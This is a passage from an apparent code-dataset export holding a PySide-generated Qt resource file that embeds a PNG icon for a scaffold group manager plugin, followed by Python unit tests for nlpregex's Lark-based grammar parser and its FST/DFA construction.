| 0.695203
| 0
| 0.066538
| 0.122116
| 8,885
| 152
| 242
| 58.453947
| 0.727179
| 0.437929
| 0
| 0.274194
| 0
| 0
| 0.062319
| 0.021048
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048387
| false
| 0
| 0.064516
| 0
| 0.193548
| 0.064516
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b5145c1cd0afbf6451b24730d934e64becc7a381
| 7,826
|
py
|
Python
|
mapclientplugins/scaffoldgroupmanagerstep/resources_rc.py
|
rchristie/mapclientplugins.scaffoldgroupmanagerstep
|
50661cf2f20eee35552b3e2d5c51ee8c28593ada
|
[
"Apache-2.0"
] | null | null | null |
mapclientplugins/scaffoldgroupmanagerstep/resources_rc.py
|
rchristie/mapclientplugins.scaffoldgroupmanagerstep
|
50661cf2f20eee35552b3e2d5c51ee8c28593ada
|
[
"Apache-2.0"
] | 1
|
2020-05-12T05:24:24.000Z
|
2020-05-13T04:00:12.000Z
|
mapclientplugins/scaffoldgroupmanagerstep/resources_rc.py
|
rchristie/mapclientplugins.scaffoldgroupmanagerstep
|
50661cf2f20eee35552b3e2d5c51ee8c28593ada
|
[
"Apache-2.0"
] | 4
|
2020-05-07T03:12:05.000Z
|
2021-05-27T21:20:20.000Z
|
# -*- coding: utf-8 -*-
# Resource object code
#
# Created: Sun 3. May 12:51:01 2020
# by: The Resource Compiler for PySide (Qt v4.8.7)
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore
qt_resource_data = b"\x00\x00\x09*\x89PNG\x0d\x0a\x1a\x0a\x00\x00\x00\x0dIHDR\x00\x00\x00@\x00\x00\x00@\x08\x06\x00\x00\x00\xaaiq\xde\x00\x00\x00\x04sBIT\x08\x08\x08\x08|\x08d\x88\x00\x00\x00\x09pHYs\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95+\x0e\x1b\x00\x00\x00\x19tEXtSoftware\x00Adobe ImageReadyq\xc9e<\x00\x00\x08\xa7IDATx\x9c\xed\x9bklS\xe7\x1d\xc6\x7f\xc7\xb9\xf8\x18\xdb`Z\x8a\xed\x84r\x89\xe3\xa0\x05\xca%\xe9\x87i\xe9h\xaa\xa47\x1a\xa9Z\xbb\xb5l\x9a&\xba\x16Z\xa0%)\x97$\xa3\xa1\x8e\x09\x04\x1c\xae\x81\xde\x96U[7\xa6m\x9d\xa6\xb5\xd3\x02\x09\x04\x0a[\x99T\xa6\x850\x822\xd5I\x9c\x94R\xdb\xa1\x8c8\xb1\x1d\x1f\xe7\xe2\xb3\x0f\xb9\x0c(U\xab8\xbe\x00\xfd}\xb1\xf4\x9e\xf7\xe8\xff<\xcf{\xcey\xcf9>\xaf\xc0\x0d\xb0X,:I\x92\x8a\x80\xc7\x05AXt\xa3>7\x0b\xb2,\x9f\x05\xfe\x02\xbcc\xb3\xd9:\xaf\xdf.\x5c\xdfPRRR\x0e\x14\xdeq\xc7\x1d\xba\xcc\xccL233\x01HKK\x8b\xac\xd2\x09\xc6\xe1p\x00\xd0\xd2\xd2BKK\x0bW\xae\x5c\xf1\x00\xd56\x9b\xad\xfc\xea~c\x01X,\x16]0\x18\xdc\x0b,\xcf\xcf\xcf'///\x9az#\xce\xf1\xe3\xc79v\xec\x18\xc0;J\xa5\xf2e\xab\xd5\xea\x01H\x1c\xed\x10\x0c\x06\xf7\x8a\xa2\xb8|\xe5\xca\x95\x18\x8d\xc6X\xe9\x8c\x18yyydffRSS\xb3\x5c\x92$\x80g\x00\x12\x00JKK\x8b\x80\xd2\xd5\xabW\xdf\x92\xe6G\xd1j\xb5\xcc\x9d;\x97\xd3\xa7O/\xba\xef\xbe\xfbzN\x9d:\xf5Q\x82\xc5b\xd1\x0d\x0e\x0e\xbe\xf7\xe0\x83\x0f\x8a\x0b\x16,\x88\xb5\xc6\x88\xa3\xd5j\x11\x04\x81\xf6\xf6\xf6o\xe7\xe7\xe7\xff\x5c\x11\x0c\x06\x97\xabT*]NNN\xac\xb5E\x8d\x9c\x9c\x1cT*\x95.\x18\x0c.W\x00\x8f\xcf\x9b7\x0fQ\x14c\xad+j\x88\xa2\xc8\xbcy\xf3\x00\x1eW\x00\xb9\xa3S\xdd\xed\xc4\x88\xe7\x5c\x05p[\x8d\xfe(\xa3\x9e\x15\x00)))1\x15\x13\x0bF=\x7fs\x04\xc4XG\xccI\xfc\xea.\xb1A\xee\xf31t\xc1\xce\xc0\x7f\x9aH\x9ci&a\x96\x19\xc5\xb4\x89\xbfI\x8b\xbb\x00B\x9f\xbb\x08\xbc\xf76\xc1\x0f\x0f\x7fa\x9b\xf8\xf0\xd3L\xfaq\xd1\x84\xd6\x8b\xab\x00\x06;\xed\xf4T\xac\x82>\x1f\xca\xfb\x0bH\xbew\x09\x00\xde7\xb7@\x9f\x8f\x90\xcf;\xe15\xe3&\x80\xc1N;\x1e\xeb\xf3\x80\xc0\x94\xcdo\x90\x94\x99\x8d\xec\xf7\xe2\xb1>O\xc8\xdb\x8b\x98[\x80\xe6\x85\xcd\x13^7n\x02\xe8}\xcd\x8a\x1c\x12\x98j}\x8b\xc4\xd9\x19\xc8~/\xdd\x96\x17\x18\xeclE|\xa0\x00\xedjKD\xea\xc6\xc5,\x10\xfc\xe7\xdf\x18\xe8hE\xb5t\x19\x89\xb33\x00\xb8bY\xc5@G+bn\x01\x93\xd7D\xc6<\xc4I\x00\xfd\xe7\xcf \xcb\x02\x93\x0a~8\xd6&L\xd2\x22\xa8&3\xf9\xc5/7\xdfs\xa0\x82\x9e\x03\x15a\xd5\x8e\x8f\x00:\xec$\xce\xce@\xa1\xd6\x8e\xb5%ef1\xe4\xf72t\xc9u\xc3}<\xfb+\xe8\xfb\xa0\x96\xbe\x0fj\xbf\xb4\xcf\xd7!.\x02 $ \xa8\xb4\xd74%\xcf\xcfF\x0e\x09\x04\x9b\xcf|\xa1\xbbg\x7f\x05}\xc7\x0f!\xa8&#\x87\x04\x06\x1c\xf6q\x97\x8e\x8b\x00\x14\xd3S\x90\x9a\x9b\xaeiS\xce\xcfB\x98\xa4\xc5\xf7\xd7w\xf1\x1f?\xc4\xe0\xc8(wWo\xc5\x7f\xec0\x89s2\xd0\xad\xdd\x8c,\x0b\xf4w\xb4\x8e\xbfvX\xca'\x88\xe4\xf9\x8b\x91e\x01\xff\xf1C\xd7\xb4\xab\xf2\x0a\x18t\xbb\xe9\xde\xb7\x0d\xf7\xb3O\xe2\x5c\xf6\xd0\x98\xf9i\xdb\xde@\x06dY@9?k\xdc\xb5\xe3b\x1a\x0c\xf9|\xc8\xb2@\xb0\xf9,\xea\xbc\xc7\xc6\xdau\xcf\x15\xa2{\xae\x90`\xf3\x19\xa4\xe6&\x82\xcdM\x84\xfc^\xee\xaa|\x1d\x85ZC\xdfG\x1f\x22\xcb\x02Ii\x19\xe3\xae\x1d\xf3\x00|\xc7\x0e\xd3]s\x80\xe443\xba\x15\x857\xec\xa3\xbc'\x0b\xe5=\xd7\x8e\xb2\xd4\xdc\x84\xbf\xa1\x0eu\xfeR\x14j\xcd\xb8\xeb\xc7\xf4\x14\xf05\xd4\xf1\xdf=\x95$\xcd13}\xc7k\x84|\xbe\xaf\xb5_\xbf\xa3\x95K\xd6\x9f!L\xd20\xe5G?\x0dKC\xcc\x02\xf05\xd4qyO%Is2\xd0\xdb\x0e0\xe8v\xe1.y\x89\xc1.7!\x9f\x8f\xcfwW\xe2k\xa8\xbbf\x9f\x90\xcfG\xf7o\x7f\x89\xabx- \xa0\xb7\x1d Q\x1f\xde\x13bLN\x01\xef\xd1:.\xef\xdeN\xb2)\x03\x83\xad\x9aA\xb7\x8b.\xeb+\xe8-\x95(\xd4\x1a\x9c\xc5\x85\x0c\xb4\xb7\xe2;Z\xcf\xe7\xbb\xb6#.X\xcc\x90\xdf\xc7@\xfb\xf0\xd5>\xd9d\xe6\xae\xf5\xa5$\xa7\x99\xc3\xd6\x12\xf5\x00\xbcG\xeb\xb8\xb4k\x07J\x93\x19cU5\x03]n\xdc\xe5e\x18\xcb\xb7\x91\xa87\xe2\xdcXH\xb0\xbd\x8di\xab^B\xa1\xd6\x108\xf7o\x06\xbb\x5c(\xd4\x1a\xb4\xdf{\x0a\xd5\x82\x85\xa8\xbf\xf3\xdd\x09\xd3\x13\xd5\x00z\x8f\xd6si\xa7\x0d\xa5)\x9d\x94\x9d#\xe6-e\x18\xac\xdbH\xd4\x1b\xf8lC\x11\xc1\xf6v\xf4\x1bK\xd1>\xf4(\xc0\xd8o\xa4\x88\xda5\xa0\xf7H=]U;HNK'u\xd7\xb0y\x97\xa5\x0c\x83u+Iz\x03\x17\xd7\x17!\xb5\xb51}Ci\xc4M_MT\x02\xe8=R\x8f\xbb\xcaF\xb2\xc9\xcc\x8c\xdd\xfb\x18p\xbbq\xbe\xba\x19c\xf9\xb0\xf9O\xd7\xbf\x8c\xd46<\xf2\x93\x1f~$\x1a\x92\xc6\x88x\x00=\xf5\xf5\xb8lU$\x9b\xcc\xdc\xbd{/\x03n7\x9f\xbd\xfa*)\xd6\x0a\x92\x0c\x06.\xac[\x87\xd4\xda\x8eacI\xd4\xcdC\x84\x03\xe8\xa9?\x82\xcb\xb6\x13\xa5\xc9\xcc\xcc={\xe8w\xbb\xb9\xb8\xd9B\xea\x96-$\x1a\x0c\x5cxy\xfd\xb0\xf9\xe2\x12&?\x12}\xf3\x10\xc1\x00z\xea\x8f\xe0\xdcQ\x85\xd2\x94\xce\xdd{w\xd3\xef\xee\xe2b\x99\x85\xd4\x0a\xeb\xb0\xf9\xa2\xf5\x04Z\xdb0\x96\x143\xe5\x91\x87#%\xe3+\x89\xc8,\xe0\xa9;\x82k\xc7N\xc4\xf4tf\xee\xdb\xcd\x80k\xd8\xfc\x8cm[H2\xe8\xf9\xa4p=\xc1\xb6vRJck\x1e\x22p\x04x\xea\x8e\xe2\xdc\xbe\x0bez:3\xab\x87\xcd\x7f\xfa\x8a\x85\x19[\xad$\x19\xf4t\xae\xdd\x80\xd4\xea\xc0XZ\xcc\x94Gck\x1e&\xe8\x08\x18\xf2\xf9\xf07\x9d\xc3\x7f\xf6\x1cW\xfe\xf8gD\xb3\x89Y\xd5\xbb\x18puqaS93+\xad$\x19\xf5t\xac\xddH\xb0\xd5A\xea\xa6\x8d\xe8\x1e}h\x22J\x87M\xd8\x01t\x1f>\x8a\xbb\xfaM\x86\xfc~\x00D\xb3\x89\xd9\xfbw^e\xbe|\xd8\xfc\x8b\x1b\x90\xda\x1c\xa4n\xda\x107\xe6!\xcc\x00z\xff\xfe\x0f>\xdbZ\x85h6\x91\xfa\xecOPg-$A3\xf2hj\xe4\xff\xe6\xd7\x0c_\xedS\xcb62ui\xfc\x98\x870\x03p\xed{\x9d$\xc3t\x8c\x85\xab\xb8\xb8\xb5\x0a\x85F\xc3\x80\xcb\xcd,\xdb\x16\xd4Y\x8b\xc0\x00\x8e\xd5\xeb\x90Z\xdb\x98QV\xcc\xd4\xa5\xb1?\xe7\xafg\xdc\x17A\xc9\xdeF\xbf\xd3\xc9\x9dO=\xc1\xe5w\xff\xc4\x9dO=\x81\xf975\xa4\xbd\xbe\x87OJ\xca\x00p\xac)B\xb2\xdb\x87\xcd?\x16\x9by\xfe\xab\x18w\x00C>/\xc8!T\x19&\xfc\x8dg\x98\xb6\xec\xfb\x00\x88\x19\xe9$\xe9\xf5\x0cy}H\x1f\xdb\x99\xf6\xf4\x93qk\x1e\xc2\x08@\xa1\xd1 \x87B\xf8\xfe\xd5\xc4\xa4\xc5\x0bq\xee\xd9\x0f@w\xeda\x86z{\xf176!\x87B\xa8\x17\xc7\xf7\xa7\xc6\xe3\x0e@\x95a&\xd9h\xe0\xf2\xef\xff\xc0\xb4e?\xa0\xdf\xe9\xe2\xdc\xbd9\xf4\x9c\xfc\x90\x19\x96Mt\xd5\xbcM\x82F\x8d:{\xf1D\xea\x9dp\xc2\xba\x11\x9a\xb5s;C\xbd^>YW\x82\xcal\x22\xed\xad\x03\xa8\xb3\x16r\xd1\xb2\x85\xc0\xc7vR\xd6\xad%A;\xfe\x17\x96\xd1 \xacY@5\xd7\x8c\xf9w\xbf\xa6s]1\xee\xb7~1\xd6\x9e\x9cbd\xd6\xae\x1dLy\xe0\xfe\xb0\x05F\x9a\xb0o\x84Ts3\xf8\xd6\xa1\xf7\x09|lg\xc8\xeb%A\xabE5w\xfc\xef\xe9\xa3\xcd\x84=\x0c\xddL\xa6\xaf&.\xfe\x1a\x8b%\xdf\x04\x10k\x01\xb1\xe6\x9b\x00\x00\x5c\xae\xf1\x7faq\xb32\xba\xa8J\x01\x10\x08\x04b*&\x96(T*\x95\xe7v<\x02F<w*\x12\x12\x12N666\xc6ZO\xd4\x19\xf1|R\xa1\xd7\xeb\xab].\xd7\xd89q;\xe0p8p\xb9\x5c(\x14\x8aj\xc5\x8a\x15+N\xaaT\xaa\x93\x07\x0f\x1edd=\xdd-\x8d$I\x1c<x\x10Y\x96\xdf\xaf\xac\xac<\xab\x00X\xb2d\xc93\xa2(zjjjn\xe9\x10$I\xa2\xa6\xa6\x86@ pV\x14\xc5g\xe0\xaa\xa5\xb3\xe7\xcf\x9f_T[[{B\x92$]AA\x01\xd9\xd9\xd9\xb1S\x1a\x01\x1a\x1b\x1b\xa9\xad\xad\x1d5\xff\xc0\xe8\xd2\xd9k\x16O\x9f8qb\xb6\xddn\xffUGGG\xee\xd4\xa9S\xc9\xce\xcef\xce\x9c9\xc0\xcd\xb5xZ\x92$\x9cN'\x00\x1d\x1d\x1d466\xd2\xdd\xdd\x8d,\xcb\xfbDQ\xb4\x8e\x9a\x87\x1b\xac\x1e\x07hhh\xc8mii)\xf4x<\xb9\x81@@\x17%\xdd\x91\xa2S\x96\xe5\xf7\x19^9\xdey\xfd\xc6\xff\x01\x83\xf4L\xe7_n_\x13\x00\x00\x00\x00IEND\xaeB`\x82"
qt_resource_name = b"\x00\x18\x01Oa`\x00s\x00c\x00a\x00f\x00f\x00o\x00l\x00d\x00g\x00r\x00o\x00u\x00p\x00m\x00a\x00n\x00a\x00g\x00e\x00r\x00s\x00t\x00e\x00p\x00\x06\x07\x03}\xc3\x00i\x00m\x00a\x00g\x00e\x00s\x00\x0b\x00E7'\x00u\x00t\x00i\x00l\x00i\x00t\x00y\x00.\x00p\x00n\x00g"
qt_resource_struct = b"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x006\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00H\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00"
def qInitResources():
QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| 355.727273
| 6,818
| 0.743675
| 1,743
| 7,826
| 3.325301
| 0.335628
| 0.052795
| 0.041925
| 0.020704
| 0.045031
| 0.04089
| 0.039337
| 0.039337
| 0.034679
| 0.030021
| 0
| 0.239043
| 0.011628
| 7,826
| 21
| 6,819
| 372.666667
| 0.510278
| 0.023384
| 0
| 0
| 0
| 0.333333
| 0.952194
| 0.949312
| 0
| 0
| 0.001048
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.111111
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d20894a2674853cb5c66e424db2ba19362a44cfb
| 91,181
|
py
|
Python
|
regular_language/unit_tests/test_lark_parser.py
|
ShoYamanishi/nlpregex
|
795b36d5a2fad8bc25264b2093ffa9c3723b282b
|
[
"MIT"
] | 1
|
2021-12-03T07:20:18.000Z
|
2021-12-03T07:20:18.000Z
|
regular_language/unit_tests/test_lark_parser.py
|
ShoYamanishi/nlpregex
|
795b36d5a2fad8bc25264b2093ffa9c3723b282b
|
[
"MIT"
] | null | null | null |
regular_language/unit_tests/test_lark_parser.py
|
ShoYamanishi/nlpregex
|
795b36d5a2fad8bc25264b2093ffa9c3723b282b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Unit Tests for lark_parser.py."""
import unittest
import nlpregex.regular_language.lark_parser
from nlpregex.regular_language.fa import DFA_from_NFA
class test_lark_parser( unittest.TestCase ):
def __init__( self, *args, **kwargs ):
unittest.TestCase.__init__(self, *args, **kwargs)
def test_0001(self):
spec01 = ''
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
self.assertEqual( len(ASTs), 0 )
def test_0002(self):
spec01 = '<nt01>:t02;'
spec_expected = 't02'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('tmp', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0002b(self):
spec01 = '<nt01>:t02 [token01 token02];'
spec_expected = 't02 [ token01 token02 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0003(self):
spec01 = '<nt01>:t02;'
spec_expected = 't02'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0004(self):
spec01 = '<nt01>:t02 t03;'
spec_expected = 't02 t03'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0004b(self):
spec01 = '<nt01>:t02 [token01 token02] t03;'
spec_expected = 't02 [ token01 token02 ] t03'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0004c(self):
spec01 = '<nt01>:t02 t03[token01 token02];'
spec_expected = 't02 t03 [ token01 token02 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0004d(self):
spec01 = '<nt01>:t02 [token01 token02] t03 [token03 token04];'
spec_expected = 't02 [ token01 token02 ] t03 [ token03 token04 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0005(self):
spec01 = '<nt01>:<nt02>;'
spec_expected = '<nt02>'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0005a(self):
spec01 = '<nt01>:<nt02> [token01];'
spec_expected = '<nt02> [ token01 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0006(self):
spec01 = '<nt01>:<nt02> <nt03>;'
spec_expected = '<nt02> <nt03>'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0006b(self):
spec01 = '<nt01>:<nt02> [token01]<nt03>;'
spec_expected = '<nt02> [ token01 ] <nt03>'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0006c(self):
spec01 = '<nt01>:<nt02> <nt03>[token01];'
spec_expected = '<nt02> <nt03> [ token01 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0006d(self):
spec01 = '<nt01>:<nt02> [token01]<nt03>[token02];'
spec_expected = '<nt02> [ token01 ] <nt03> [ token02 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0006e(self):
spec01 = '<nt01>:(<nt02> <nt03>)[token02];'
spec_expected = '( <nt02> <nt03> ) [ token02 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0006f(self):
spec01 = '<nt01>:(<nt02> [token01]<nt03>[token02])[token03];'
spec_expected = '( <nt02> [ token01 ] <nt03> [ token02 ] ) [ token03 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0007(self):
spec01 = '<nt01>:<nt02> <nt03>;'
spec_expected = '<nt02> <nt03>'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0008(self):
spec01 = '<nt01>:( <nt02> | <nt03> );'
spec_expected = '( <nt02> | <nt03> )'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0008b(self):
spec01 = '<nt01>:( <nt02>[token01] | <nt03> );'
spec_expected = '( <nt02> [ token01 ] | <nt03> )'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0008c(self):
spec01 = '<nt01>:( <nt02> | <nt03> [token01]);'
spec_expected = '( <nt02> | <nt03> [ token01 ] )'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0008d(self):
spec01 = '<nt01>:( <nt02> [token01]| <nt03> [token02]);'
spec_expected = '( <nt02> [ token01 ] | <nt03> [ token02 ] )'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst03 = DFA_from_NFA(fst01, True)
# fst03.draw('dfa2', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0008e(self):
spec01 = '<nt01>:( <nt02> [token01]| <nt03> [token02])[token03];'
spec_expected = '( <nt02> [ token01 ] | <nt03> [ token02 ] ) [ token03 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
